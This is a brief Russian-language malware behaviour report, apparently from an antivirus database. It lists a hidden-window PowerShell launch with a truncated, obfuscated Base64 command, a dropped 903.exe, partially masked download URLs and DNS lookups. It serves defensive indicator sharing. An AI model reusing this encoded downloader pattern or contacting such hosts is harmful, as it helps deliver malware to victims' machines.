Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiAC...
- %HOMEPATH%\903.exe
- %HOMEPATH%\903.exe
- http://el####gelondon.com/wp-admin/QS/
- http://em##tg.com/guestbook/uQ4qC339/
- http://el##ent.com/assets/ReH6966/
- http://el##ent.com/cgi-sys/suspendedpage.cgi
- http://el###akina.net/ww4w/WnRLv/
- http://el#####obusiness.com/takeout.eliteseobusiness.com/GYa538680/
- DNS ASK el####gelondon.com
- DNS ASK em##tg.com
- DNS ASK el##ent.com
- DNS ASK el###akina.net
- DNS ASK el#####obusiness.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABOAFYARgBLAEwAdQB6AGcAPQAnAEoAUQBQAEkASgBiAHYAZQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAAZQBgAEMAYABVAFIAYABpAHQAWQBQAFIATwBUAG8AQwBgAE8ATAAiAC...' (со скрытым окном)